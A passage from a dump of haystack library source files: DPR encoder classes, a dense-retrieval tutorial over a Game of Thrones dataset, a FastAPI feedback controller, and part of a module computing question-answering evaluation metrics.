This output is to be used to embed questions for\n nearest neighbors queries with context embeddings.\n hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):\n Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)\n of shape :obj:`(batch_size, sequence_length, hidden_size)`.\n\n Hidden-states of the model at the output of each layer plus the initial embedding outputs.\n attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):\n Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape\n :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.\n\n Attentions weights after the attention softmax, used to compute the weighted average in the self-attention\n heads.\n \"\"\"\n\n pooler_output: torch.FloatTensor\n hidden_states: Optional[Tuple[torch.FloatTensor]] = None\n attentions: Optional[Tuple[torch.FloatTensor]] = None\n\n\n@dataclass\nclass DPRReaderOutput(ModelOutput):\n \"\"\"\n Class for outputs of :class:`~transformers.DPRQuestionEncoder`.\n\n Args:\n start_logits: (:obj:``torch.FloatTensor`` of shape ``(n_passages, sequence_length)``):\n Logits of the start index of the span for each passage.\n end_logits: (:obj:``torch.FloatTensor`` of shape ``(n_passages, sequence_length)``):\n Logits of the end index of the span for each passage.\n relevance_logits: (:obj:`torch.FloatTensor`` of shape ``(n_passages, )``):\n Outputs of the QA classifier of the DPRReader that corresponds to the scores of each passage\n to answer the question, compared to all the other passages.\n hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):\n Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)\n of shape :obj:`(batch_size, sequence_length, hidden_size)`.\n\n Hidden-states of the model at the output of each layer plus the initial embedding outputs.\n attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):\n Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape\n :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.\n\n Attentions weights after the attention softmax, used to compute the weighted average in the self-attention\n heads.\n \"\"\"\n\n start_logits: torch.FloatTensor\n end_logits: torch.FloatTensor\n relevance_logits: torch.FloatTensor\n hidden_states: Optional[Tuple[torch.FloatTensor]] = None\n attentions: Optional[Tuple[torch.FloatTensor]] = None\n\n##################\n# PreTrainedModel\n##################\n\nclass DPREncoder(PreTrainedModel):\n\n base_model_prefix = \"bert_model\"\n\n def __init__(self, config: DPRConfig):\n super().__init__(config)\n self.bert_model = BertModel(config)\n assert self.bert_model.config.hidden_size > 0, \"Encoder hidden_size can't be zero\"\n self.projection_dim = config.projection_dim\n if self.projection_dim > 0:\n self.encode_proj = nn.Linear(self.bert_model.config.hidden_size, config.projection_dim)\n self.init_weights()\n\n def forward(\n self,\n input_ids: Tensor,\n attention_mask: Optional[Tensor] = None,\n token_type_ids: Optional[Tensor] = None,\n inputs_embeds: Optional[Tensor] = None,\n output_attentions: bool = 
False,\n output_hidden_states: bool = False,\n return_tuple: bool = True,\n ) -> Union[BaseModelOutputWithPooling, Tuple[Tensor, ...]]:\n outputs = self.bert_model(\n input_ids=input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n inputs_embeds=inputs_embeds,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n )\n sequence_output, pooled_output = outputs[:2]\n pooled_output = sequence_output[:, 0, :]\n if self.projection_dim > 0:\n pooled_output = self.encode_proj(pooled_output)\n\n if return_tuple:\n return (sequence_output, pooled_output) + outputs[2:]\n\n return BaseModelOutputWithPooling(\n last_hidden_state=sequence_output,\n pooler_output=pooled_output,\n hidden_states=outputs.hidden_states,\n attentions=outputs.attentions,\n )\n\n @property\n def embeddings_size(self) -> int:\n if self.projection_dim > 0:\n return self.encode_proj.out_features\n return self.bert_model.config.hidden_size\n\n def init_weights(self):\n self.bert_model.init_weights()\n if self.projection_dim > 0:\n self.encode_proj.apply(self.bert_model._init_weights)\n\n\nclass DPRPretrainedContextEncoder(PreTrainedModel):\n \"\"\" An abstract class to handle weights initialization and\n a simple interface for downloading and loading pretrained models.\n \"\"\"\n\n config_class = DPRConfig\n load_tf_weights = None\n base_model_prefix = \"ctx_encoder\"\n\n def init_weights(self):\n self.ctx_encoder.init_weights()\n\n\nclass DPRPretrainedQuestionEncoder(PreTrainedModel):\n \"\"\" An abstract class to handle weights initialization and\n a simple interface for downloading and loading pretrained models.\n \"\"\"\n\n config_class = DPRConfig\n load_tf_weights = None\n base_model_prefix = \"question_encoder\"\n\n def init_weights(self):\n self.question_encoder.init_weights()\n\n\nDPR_START_DOCSTRING = r\"\"\"\n\n This model is a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`_ sub-class.\n Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general\n usage and behavior.\n\n Parameters:\n config (:class:`~transformers.DPRConfig`): Model configuration class with all the parameters of the model.\n Initializing with a config file does not load the weights associated with the model, only the configuration.\n Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model weights.\n\"\"\"\n\n\nDPR_ENCODERS_INPUTS_DOCSTRING = r\"\"\"\n Args:\n input_ids: (:obj:``torch.LongTensor`` of shape ``(batch_size, sequence_length)``):\n Indices of input sequence tokens in the vocabulary.\n To match pre-training, DPR input sequence should be formatted with [CLS] and [SEP] tokens as follows:\n\n (a) For sequence pairs (for a pair title+text for example):\n\n ``tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]``\n\n ``token_type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1``\n\n (b) For single sequences (for a question for example):\n\n ``tokens: [CLS] the dog is hairy . 
[SEP]``\n\n ``token_type_ids: 0 0 0 0 0 0 0``\n\n DPR is a model with absolute position embeddings so it's usually advised to pad the inputs on\n the right rather than the left.\n\n Indices can be obtained using :class:`transformers.DPRTokenizer`.\n See :func:`transformers.PreTrainedTokenizer.encode` and\n :func:`transformers.PreTrainedTokenizer.convert_tokens_to_ids` for details.\n attention_mask: (:obj:``torch.FloatTensor`` of shape ``(batch_size, sequence_length)``, `optional`, defaults to :obj:`None`):\n Mask to avoid performing attention on padding token indices.\n Mask values selected in ``[0, 1]``:\n ``1`` for tokens that are NOT MASKED, ``0`` for MASKED tokens.\n token_type_ids: (:obj:``torch.LongTensor`` of shape ``(batch_size, sequence_length)``, `optional`, defaults to :obj:`None`):\n Segment token indices to indicate first and second portions of the inputs.\n Indices are selected in ``[0, 1]``: ``0`` corresponds to a `sentence A` token, ``1``\n corresponds to a `sentence B` token\n inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`, defaults to :obj:`None`):\n Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation.\n This is useful if you want more control over how to convert `input_ids` indices into associated vectors\n output_attentions (:obj:`bool`, `optional`, defaults to :obj:`None`):\n If set to ``True``, the attentions tensors of all attention layers are returned. See ``attentions`` under returned tensors for more detail.\n output_hidden_states (:obj:`bool`, `optional`, defaults to :obj:`None`):\n If set to ``True``, the hidden states tensors of all layers are returned. See ``hidden_states`` under returned tensors for more detail.\n\"\"\"\n\n\n@add_start_docstrings(\n \"The bare DPRContextEncoder transformer outputting pooler outputs as context representations.\",\n DPR_START_DOCSTRING,\n)\nclass DPRContextEncoder(DPRPretrainedContextEncoder):\n def __init__(self, config: DPRConfig):\n super().__init__(config)\n self.config = config\n self.ctx_encoder = DPREncoder(config)\n self.init_weights()\n\n @add_start_docstrings_to_callable(DPR_ENCODERS_INPUTS_DOCSTRING)\n @replace_return_docstrings(output_type=DPRContextEncoderOutput, config_class=_CONFIG_FOR_DOC)\n def forward(\n self,\n input_ids: Optional[Tensor] = None,\n attention_mask: Optional[Tensor] = None,\n token_type_ids: Optional[Tensor] = None,\n inputs_embeds: Optional[Tensor] = None,\n output_attentions=None,\n output_hidden_states=None,\n return_tuple=True,\n ) -> Union[DPRContextEncoderOutput, Tuple[Tensor, ...]]:\n r\"\"\"\n Return:\n\n Examples::\n\n from transformers import DPRContextEncoder, DPRContextEncoderTokenizer\n tokenizer = DPRContextEncoderTokenizer.from_pretrained('facebook/dpr-ctx_encoder-single-nq-base')\n model = DPRContextEncoder.from_pretrained('facebook/dpr-ctx_encoder-single-nq-base')\n input_ids = tokenizer(\"Hello, is my dog cute ?\", return_tensors='pt')[\"input_ids\"]\n embeddings = model(input_ids)[0] # the embeddings of the given context.\n\n \"\"\"\n\n output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions\n output_hidden_states = (\n output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states\n )\n return_tuple = return_tuple if return_tuple is not None else self.config.use_return_tuple\n\n if input_ids is not None and inputs_embeds is not None:\n raise ValueError(\"You cannot specify both 
input_ids and inputs_embeds at the same time\")\n elif input_ids is not None:\n input_shape = input_ids.size()\n device = input_ids.device\n elif inputs_embeds is not None:\n input_shape = torch.Size(inputs_embeds.size()[:-1])\n device = inputs_embeds.device\n else:\n raise ValueError(\"You have to specify either input_ids or inputs_embeds\")\n\n if attention_mask is None:\n attention_mask = (\n torch.ones(input_shape, device=device)\n if input_ids is None\n else (input_ids != self.config.pad_token_id)\n )\n if token_type_ids is None:\n token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)\n\n outputs = self.ctx_encoder(\n input_ids=input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n inputs_embeds=inputs_embeds,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n )\n\n if return_tuple:\n return outputs[1:]\n return DPRContextEncoderOutput(\n pooler_output=outputs.pooler_output, hidden_states=outputs.hidden_states, attentions=outputs.attentions\n )\n\n\n@add_start_docstrings(\n \"The bare DPRQuestionEncoder transformer outputting pooler outputs as question representations.\",\n DPR_START_DOCSTRING,\n)\nclass DPRQuestionEncoder(DPRPretrainedQuestionEncoder):\n def __init__(self, config: DPRConfig):\n super().__init__(config)\n self.config = config\n self.question_encoder = DPREncoder(config)\n self.init_weights()\n\n @add_start_docstrings_to_callable(DPR_ENCODERS_INPUTS_DOCSTRING)\n @replace_return_docstrings(output_type=DPRQuestionEncoderOutput, config_class=_CONFIG_FOR_DOC)\n def forward(\n self,\n input_ids: Optional[Tensor] = None,\n attention_mask: Optional[Tensor] = None,\n token_type_ids: Optional[Tensor] = None,\n inputs_embeds: Optional[Tensor] = None,\n output_attentions=None,\n output_hidden_states=None,\n return_tuple=True,\n ) -> Union[DPRQuestionEncoderOutput, Tuple[Tensor, ...]]:\n r\"\"\"\n Return:\n\n Examples::\n\n from transformers import DPRQuestionEncoder, DPRQuestionEncoderTokenizer\n tokenizer = DPRQuestionEncoderTokenizer.from_pretrained('facebook/dpr-question_encoder-single-nq-base')\n model = DPRQuestionEncoder.from_pretrained('facebook/dpr-question_encoder-single-nq-base')\n input_ids = tokenizer(\"Hello, is my dog cute ?\", return_tensors='pt')[\"input_ids\"]\n embeddings = model(input_ids)[0] # the embeddings of the given question.\n \"\"\"\n output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions\n output_hidden_states = (\n output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states\n )\n return_tuple = return_tuple if return_tuple is not None else self.config.use_return_tuple\n\n if input_ids is not None and inputs_embeds is not None:\n raise ValueError(\"You cannot specify both input_ids and inputs_embeds at the same time\")\n elif input_ids is not None:\n input_shape = input_ids.size()\n device = input_ids.device\n elif inputs_embeds is not None:\n input_shape = torch.Size(inputs_embeds.size()[:-1])\n device = inputs_embeds.device\n else:\n raise ValueError(\"You have to specify either input_ids or inputs_embeds\")\n\n if attention_mask is None:\n attention_mask = (\n torch.ones(input_shape, device=device)\n if input_ids is None\n else (input_ids != self.config.pad_token_id)\n )\n if token_type_ids is None:\n token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)\n\n outputs = self.question_encoder(\n input_ids=input_ids,\n attention_mask=attention_mask,\n 
token_type_ids=token_type_ids,\n inputs_embeds=inputs_embeds,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_tuple=return_tuple,\n )\n\n if return_tuple:\n return outputs[1:]\n return DPRQuestionEncoderOutput(\n pooler_output=outputs.pooler_output, hidden_states=outputs.hidden_states, attentions=outputs.attentions\n )\n\n\n# UTILS\ndef move_to_device(sample, device):\n if len(sample) == 0:\n return {}\n\n def _move_to_device(maybe_tensor, device):\n if torch.is_tensor(maybe_tensor):\n return maybe_tensor.to(device)\n elif isinstance(maybe_tensor, dict):\n return {\n key: _move_to_device(value, device)\n for key, value in maybe_tensor.items()\n }\n elif isinstance(maybe_tensor, list):\n return [_move_to_device(x, device) for x in maybe_tensor]\n elif isinstance(maybe_tensor, tuple):\n return [_move_to_device(x, device) for x in maybe_tensor]\n else:\n return maybe_tensor\n\n return _move_to_device(sample, device)\n\ndef unpack(gzip_file: str, out_file: str):\n print('Uncompressing ', gzip_file)\n input = gzip.GzipFile(gzip_file, 'rb')\n s = input.read()\n input.close()\n output = open(out_file, 'wb')\n output.write(s)\n output.close()\n print('Saved to ', out_file)"
},
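The `move_to_device` utility at the end of the file above recurses through nested containers and moves only tensors. A small behavioral sketch (the batch structure here is invented for illustration):

```python
# Sketch: move_to_device() recurses into dicts, lists and tuples, moving only
# torch tensors; everything else passes through unchanged. Sample batch made up.
import torch

batch = {
    "input_ids": torch.ones(2, 8, dtype=torch.long),
    "extras": [torch.zeros(2), "not a tensor"],
}
batch = move_to_device(batch, torch.device("cpu"))
print(type(batch["input_ids"]), batch["extras"][1])  # tensor moved, str kept
```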
{
"alpha_fraction": 0.7384964227676392,
"alphanum_fraction": 0.741736888885498,
"avg_line_length": 49.59016418457031,
"blob_id": "95490e765aca18ba98ebd386e1186eef8beedf14",
"content_id": "b2cb2b9c26a3d73362bae1f966bb185217e4a5be",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3087,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 61,
"path": "/tutorials/Tutorial6_Better_Retrieval_via_DPR.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from haystack import Finder\nfrom haystack.database.faiss import FAISSDocumentStore\nfrom haystack.indexing.cleaning import clean_wiki_text\nfrom haystack.indexing.utils import convert_files_to_dicts, fetch_archive_from_http\nfrom haystack.reader.farm import FARMReader\nfrom haystack.utils import print_answers\nfrom haystack.retriever.dense import DensePassageRetriever\n\n\n# FAISS is a library for efficient similarity search on a cluster of dense vectors.\n# The FAISSDocumentStore uses a SQL(SQLite in-memory be default) database under-the-hood\n# to store the document text and other meta data. The vector embeddings of the text are\n# indexed on a FAISS Index that later is queried for searching answers.\ndocument_store = FAISSDocumentStore()\n\n# ## Cleaning & indexing documents\n# Let's first get some documents that we want to query\ndoc_dir = \"data/article_txt_got\"\ns3_url = \"https://s3.eu-central-1.amazonaws.com/deepset.ai-farm-qa/datasets/documents/wiki_gameofthrones_txt.zip\"\nfetch_archive_from_http(url=s3_url, output_dir=doc_dir)\n\n# convert files to dicts containing documents that can be indexed to our datastore\ndicts = convert_files_to_dicts(dir_path=doc_dir, clean_func=clean_wiki_text, split_paragraphs=True)\n\n# Now, let's write the docs to our DB.\ndocument_store.write_documents(dicts)\n\n### Retriever\nretriever = DensePassageRetriever(document_store=document_store,\n query_embedding_model=\"facebook/dpr-question_encoder-single-nq-base\",\n passage_embedding_model=\"facebook/dpr-ctx_encoder-single-nq-base\",\n use_gpu=True,\n embed_title=True,\n remove_sep_tok_from_untitled_passages=True)\n\n# Important:\n# Now that after we have the DPR initialized, we need to call update_embeddings() to iterate over all\n# previously indexed documents and update their embedding representation.\n# While this can be a time consuming operation (depending on corpus size), it only needs to be done once.\n# At query time, we only need to embed the query and compare it the existing doc embeddings which is very fast.\ndocument_store.update_embeddings(retriever)\n\n### Reader\n# Load a local model or any of the QA models on\n# Hugging Face's model hub (https://huggingface.co/models)\nreader = FARMReader(model_name_or_path=\"deepset/roberta-base-squad2\", use_gpu=True)\n\n### Finder\n# The Finder sticks together reader and retriever in a pipeline to answer our actual questions.\nfinder = Finder(reader, retriever)\n\n### Voilà! Ask a question!\n# You can configure how many candidates the reader and retriever shall return\n# The higher top_k_retriever, the better (but also the slower) your answers.\nprediction = finder.get_answers(question=\"Who is the father of Arya Stark?\", top_k_retriever=10, top_k_reader=5)\n\n\n# prediction = finder.get_answers(question=\"Who created the Dothraki vocabulary?\", top_k_reader=5)\n# prediction = finder.get_answers(question=\"Who is the sister of Sansa?\", top_k_reader=5)\n\nprint_answers(prediction, details=\"minimal\")\n"
},
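One practical follow-up to the tutorial above: the FAISS index is rebuilt from scratch on every run. A minimal sketch of persisting it with the `save()`/`load()` methods that `FAISSDocumentStore` defines (shown later in this dump); the file names and the file-based SQL URL are assumptions for illustration:

```python
# Persist the tutorial's index between runs (file names are made up).
# Note: the document text lives in the SQL store, so a file-based sqlite URL
# (rather than the in-memory default) is needed for true persistence.
document_store.save("tutorial6.faiss")

from haystack.database.faiss import FAISSDocumentStore
document_store = FAISSDocumentStore.load(
    faiss_file_path="tutorial6.faiss",
    sql_url="sqlite:///tutorial6.db",  # must match the DB used at indexing time
)
```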
{
"alpha_fraction": 0.6692664623260498,
"alphanum_fraction": 0.6715851426124573,
"avg_line_length": 34.402984619140625,
"blob_id": "a101426500aec2b0cdc804044f890095a281593c",
"content_id": "c0039a0627482b046a1be4ca0a6614da000e15ad",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4744,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 134,
"path": "/rest_api/controller/feedback.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from typing import Optional\n\nfrom fastapi import APIRouter\nfrom pydantic import BaseModel, Field\n\nfrom haystack.database.elasticsearch import ElasticsearchDocumentStore\nfrom rest_api.config import (\n DB_HOST,\n DB_PORT,\n DB_USER,\n DB_PW,\n DB_INDEX,\n ES_CONN_SCHEME,\n TEXT_FIELD_NAME,\n SEARCH_FIELD_NAME,\n EMBEDDING_DIM,\n EMBEDDING_FIELD_NAME,\n EXCLUDE_META_DATA_FIELDS,\n FAQ_QUESTION_FIELD_NAME,\n)\nfrom rest_api.config import DB_INDEX_FEEDBACK\n\nrouter = APIRouter()\n\ndocument_store = ElasticsearchDocumentStore(\n host=DB_HOST,\n port=DB_PORT,\n username=DB_USER,\n password=DB_PW,\n index=DB_INDEX,\n scheme=ES_CONN_SCHEME,\n ca_certs=False,\n verify_certs=False,\n text_field=TEXT_FIELD_NAME,\n search_fields=SEARCH_FIELD_NAME,\n faq_question_field=FAQ_QUESTION_FIELD_NAME,\n embedding_dim=EMBEDDING_DIM,\n embedding_field=EMBEDDING_FIELD_NAME,\n excluded_meta_data=EXCLUDE_META_DATA_FIELDS, # type: ignore\n)\n\n\nclass FAQQAFeedback(BaseModel):\n question: str = Field(..., description=\"The question input by the user, i.e., the query.\")\n is_correct_answer: bool = Field(..., description=\"Whether the answer is correct or not.\")\n document_id: str = Field(..., description=\"The document in the query result for which feedback is given.\")\n model_id: Optional[int] = Field(None, description=\"The model used for the query.\")\n\n\nclass DocQAFeedback(FAQQAFeedback):\n is_correct_document: bool = Field(\n ...,\n description=\"In case of negative feedback, there could be two cases; incorrect answer but correct \"\n \"document & incorrect document. This flag denotes if the returned document was correct.\",\n )\n answer: str = Field(..., description=\"The answer string.\")\n offset_start_in_doc: int = Field(\n ..., description=\"The answer start offset in the original doc. 
Only required for doc-qa feedback.\"\n )\n\n\[email protected](\"/doc-qa-feedback\")\ndef doc_qa_feedback(feedback: DocQAFeedback):\n document_store.write_labels([{\"origin\": \"user-feedback\", **feedback.dict()}])\n\n\[email protected](\"/faq-qa-feedback\")\ndef faq_qa_feedback(feedback: FAQQAFeedback):\n feedback_payload = {\"is_correct_document\": feedback.is_correct_answer, \"answer\": None, **feedback.dict()}\n document_store.write_labels([{\"origin\": \"user-feedback-faq\", **feedback_payload}])\n\n\[email protected](\"/export-doc-qa-feedback\")\ndef export_doc_qa_feedback(context_size: int = 2_000):\n \"\"\"\n SQuAD format JSON export for question/answer pairs that were marked as \"relevant\".\n\n The context_size param can be used to limit response size for large documents.\n \"\"\"\n labels = document_store.get_all_labels(\n index=DB_INDEX_FEEDBACK, filters={\"is_correct_answer\": [True], \"origin\": [\"user-feedback\"]}\n )\n\n export_data = []\n for label in labels:\n document = document_store.get_document_by_id(label.document_id)\n text = document.text\n\n # the final length of context(including the answer string) is 'context_size'.\n # we try to add equal characters for context before and after the answer string.\n # if either beginning or end of text is reached, we correspondingly\n # append more context characters at the other end of answer string.\n context_to_add = int((context_size - len(label.answer)) / 2)\n\n start_pos = max(label.offset_start_in_doc - context_to_add, 0)\n additional_context_at_end = max(context_to_add - label.offset_start_in_doc, 0)\n\n end_pos = min(label.offset_start_in_doc + len(label.answer) + context_to_add, len(text) - 1)\n additional_context_at_start = max(label.offset_start_in_doc + len(label.answer) + context_to_add - len(text), 0)\n\n start_pos = max(0, start_pos - additional_context_at_start)\n end_pos = min(len(text) - 1, end_pos + additional_context_at_end)\n\n context_to_export = text[start_pos:end_pos]\n\n export_data.append({\"paragraphs\": [{\"qas\": label, \"context\": context_to_export}]})\n\n export = {\"data\": export_data}\n\n return export\n\n\[email protected](\"/export-faq-qa-feedback\")\ndef export_faq_feedback():\n \"\"\"\n Export feedback for faq-qa in JSON format.\n \"\"\"\n\n labels = document_store.get_all_labels(index=DB_INDEX_FEEDBACK, filters={\"origin\": [\"user-feedback-faq\"]})\n\n export_data = []\n for label in labels:\n document = document_store.get_document_by_id(label.document_id)\n feedback = {\n \"question\": document.question,\n \"query\": label.question,\n \"is_correct_answer\": label.is_correct_answer,\n \"is_correct_document\": label.is_correct_answer,\n }\n export_data.append(feedback)\n\n export = {\"data\": export_data}\n\n return export\n"
},
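For context, a hypothetical client call against the `/doc-qa-feedback` route defined above; the host, port and payload values are invented:

```python
# Submitting document-QA feedback to the REST API sketched above.
import requests

payload = {
    "question": "Who is the father of Arya Stark?",
    "is_correct_answer": True,
    "is_correct_document": True,
    "document_id": "6f0c1a8b-example",   # ID returned with the original answer
    "answer": "Eddard Stark",
    "offset_start_in_doc": 42,
}
requests.post("http://localhost:8000/doc-qa-feedback", json=payload).raise_for_status()
```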
{
"alpha_fraction": 0.5685575008392334,
"alphanum_fraction": 0.5794327259063721,
"avg_line_length": 45.350807189941406,
"blob_id": "67cce80f1c790a412b07c5387d3d9bb35ac729d0",
"content_id": "ef14372515f617ab0a6bf005b874f04bd988e3c8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11494,
"license_type": "permissive",
"max_line_length": 142,
"num_lines": 248,
"path": "/haystack/eval.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from typing import List, Tuple, Dict, Any\n\nfrom haystack.database.base import MultiLabel\n\n\ndef calculate_reader_metrics(metric_counts: Dict[str, float], correct_retrievals: int):\n number_of_has_answer = correct_retrievals - metric_counts[\"number_of_no_answer\"]\n\n metrics = {\n \"reader_top1_accuracy\" : metric_counts[\"correct_readings_top1\"] / correct_retrievals,\n \"reader_top1_accuracy_has_answer\" : metric_counts[\"correct_readings_top1_has_answer\"] / number_of_has_answer,\n \"reader_topk_accuracy\" : metric_counts[\"correct_readings_topk\"] / correct_retrievals,\n \"reader_topk_accuracy_has_answer\" : metric_counts[\"correct_readings_topk_has_answer\"] / number_of_has_answer,\n \"reader_top1_em\" : metric_counts[\"exact_matches_top1\"] / correct_retrievals,\n \"reader_top1_em_has_answer\" : metric_counts[\"exact_matches_top1_has_answer\"] / number_of_has_answer,\n \"reader_topk_em\" : metric_counts[\"exact_matches_topk\"] / correct_retrievals,\n \"reader_topk_em_has_answer\" : metric_counts[\"exact_matches_topk_has_answer\"] / number_of_has_answer,\n \"reader_top1_f1\" : metric_counts[\"summed_f1_top1\"] / correct_retrievals,\n \"reader_top1_f1_has_answer\" : metric_counts[\"summed_f1_top1_has_answer\"] / number_of_has_answer,\n \"reader_topk_f1\" : metric_counts[\"summed_f1_topk\"] / correct_retrievals,\n \"reader_topk_f1_has_answer\" : metric_counts[\"summed_f1_topk_has_answer\"] / number_of_has_answer,\n }\n\n if metric_counts[\"number_of_no_answer\"]:\n metrics[\"reader_top1_no_answer_accuracy\"] = metric_counts[\"correct_no_answers_top1\"] / metric_counts[\n \"number_of_no_answer\"]\n metrics[\"reader_topk_no_answer_accuracy\"] = metric_counts[\"correct_no_answers_topk\"] / metric_counts[\n \"number_of_no_answer\"]\n else:\n metrics[\"reader_top1_no_answer_accuracy\"] = None # type: ignore\n metrics[\"reader_topk_no_answer_accuracy\"] = None # type: ignore\n\n return metrics\n\n\ndef calculate_average_precision(questions_with_docs: List[dict]):\n questions_with_correct_doc = []\n summed_avg_precision_retriever = 0.0\n\n for question in questions_with_docs:\n for doc_idx, doc in enumerate(question[\"docs\"]):\n # check if correct doc among retrieved docs\n if doc.id in question[\"question\"].multiple_document_ids:\n summed_avg_precision_retriever += 1 / (doc_idx + 1)\n questions_with_correct_doc.append({\n \"question\": question[\"question\"],\n \"docs\": question[\"docs\"]\n })\n break\n\n return questions_with_correct_doc, summed_avg_precision_retriever\n\n\ndef eval_counts_reader(question: MultiLabel, predicted_answers: Dict[str, Any], metric_counts: Dict[str, float]):\n # Calculates evaluation metrics for one question and adds results to counter.\n # check if question is answerable\n if not question.no_answer:\n found_answer = False\n found_em = False\n best_f1 = 0\n for answer_idx, answer in enumerate(predicted_answers[\"answers\"]):\n if answer[\"document_id\"] in question.multiple_document_ids:\n gold_spans = [{\"offset_start\": question.multiple_offset_start_in_docs[i],\n \"offset_end\": question.multiple_offset_start_in_docs[i] + len(question.multiple_answers[i]),\n \"doc_id\": question.multiple_document_ids[i]} for i in range(len(question.multiple_answers))] # type: ignore\n predicted_span = {\"offset_start\": answer[\"offset_start_in_doc\"],\n \"offset_end\": answer[\"offset_end_in_doc\"],\n \"doc_id\": answer[\"document_id\"]}\n best_f1_in_gold_spans = 0\n for gold_span in gold_spans:\n if gold_span[\"doc_id\"] == predicted_span[\"doc_id\"]:\n # 
check if overlap between gold answer and predicted answer\n if not found_answer:\n metric_counts, found_answer = _count_overlap(gold_span, predicted_span, metric_counts, answer_idx) # type: ignore\n\n # check for exact match\n if not found_em:\n metric_counts, found_em = _count_exact_match(gold_span, predicted_span, metric_counts, answer_idx) # type: ignore\n\n # calculate f1\n current_f1 = _calculate_f1(gold_span, predicted_span) # type: ignore\n if current_f1 > best_f1_in_gold_spans:\n best_f1_in_gold_spans = current_f1\n # top-1 f1\n if answer_idx == 0:\n metric_counts[\"summed_f1_top1\"] += best_f1_in_gold_spans\n metric_counts[\"summed_f1_top1_has_answer\"] += best_f1_in_gold_spans\n if best_f1_in_gold_spans > best_f1:\n best_f1 = best_f1_in_gold_spans\n\n if found_em:\n break\n # top-k answers: use best f1-score\n metric_counts[\"summed_f1_topk\"] += best_f1\n metric_counts[\"summed_f1_topk_has_answer\"] += best_f1\n\n # question not answerable\n else:\n metric_counts[\"number_of_no_answer\"] += 1\n metric_counts = _count_no_answer(predicted_answers[\"answers\"], metric_counts)\n\n return metric_counts\n\n\ndef eval_counts_reader_batch(pred: Dict[str, Any], metric_counts: Dict[str, float]):\n # Calculates evaluation metrics for one question and adds results to counter.\n\n # check if question is answerable\n if not pred[\"label\"].no_answer:\n found_answer = False\n found_em = False\n best_f1 = 0\n for answer_idx, answer in enumerate(pred[\"answers\"]):\n # check if correct document:\n if answer[\"document_id\"] in pred[\"label\"].multiple_document_ids:\n gold_spans = [{\"offset_start\": pred[\"label\"].multiple_offset_start_in_docs[i],\n \"offset_end\": pred[\"label\"].multiple_offset_start_in_docs[i] + len(pred[\"label\"].multiple_answers[i]),\n \"doc_id\": pred[\"label\"].multiple_document_ids[i]}\n for i in range(len(pred[\"label\"].multiple_answers))] # type: ignore\n predicted_span = {\"offset_start\": answer[\"offset_start_in_doc\"],\n \"offset_end\": answer[\"offset_end_in_doc\"],\n \"doc_id\": answer[\"document_id\"]}\n\n best_f1_in_gold_spans = 0\n for gold_span in gold_spans:\n if gold_span[\"doc_id\"] == predicted_span[\"doc_id\"]:\n # check if overlap between gold answer and predicted answer\n if not found_answer:\n metric_counts, found_answer = _count_overlap(\n gold_span, predicted_span, metric_counts, answer_idx\n )\n # check for exact match\n if not found_em:\n metric_counts, found_em = _count_exact_match(\n gold_span, predicted_span, metric_counts, answer_idx\n )\n # calculate f1\n current_f1 = _calculate_f1(gold_span, predicted_span)\n if current_f1 > best_f1_in_gold_spans:\n best_f1_in_gold_spans = current_f1\n # top-1 f1\n if answer_idx == 0:\n metric_counts[\"summed_f1_top1\"] += best_f1_in_gold_spans\n metric_counts[\"summed_f1_top1_has_answer\"] += best_f1_in_gold_spans\n if best_f1_in_gold_spans > best_f1:\n best_f1 = best_f1_in_gold_spans\n\n if found_em:\n break\n\n # top-k answers: use best f1-score\n metric_counts[\"summed_f1_topk\"] += best_f1\n metric_counts[\"summed_f1_topk_has_answer\"] += best_f1\n\n # question not answerable\n else:\n metric_counts[\"number_of_no_answer\"] += 1\n metric_counts = _count_no_answer(pred[\"answers\"], metric_counts)\n\n return metric_counts\n\n\ndef _count_overlap(\n gold_span: Dict[str, Any],\n predicted_span: Dict[str, Any],\n metric_counts: Dict[str, float],\n answer_idx: int\n ):\n # Checks if overlap between prediction and real answer.\n\n found_answer = False\n\n if (gold_span[\"offset_start\"] <= 
